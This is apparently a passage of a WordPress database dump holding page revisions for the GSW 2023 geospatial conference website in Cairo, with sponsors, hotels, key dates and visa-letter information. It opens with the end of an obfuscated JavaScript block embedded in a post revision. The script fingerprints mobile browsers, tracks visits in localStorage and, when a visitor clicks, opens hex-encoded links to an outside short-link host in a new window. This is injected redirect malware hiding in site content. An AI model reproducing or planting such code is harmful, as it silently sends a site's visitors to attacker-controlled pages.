_0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-14 10:52:41','2023-06-14 10:52:41','',3066,'https://gsw2023.com/?p=4702',0,'revision','',0),
(4703,1,'2023-06-14 10:53:36','2023-06-14 10:53:36','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686739947627{margin-top: -25px !important;}\"]&nbsp;</p>\n<p><a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]&nbsp;</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 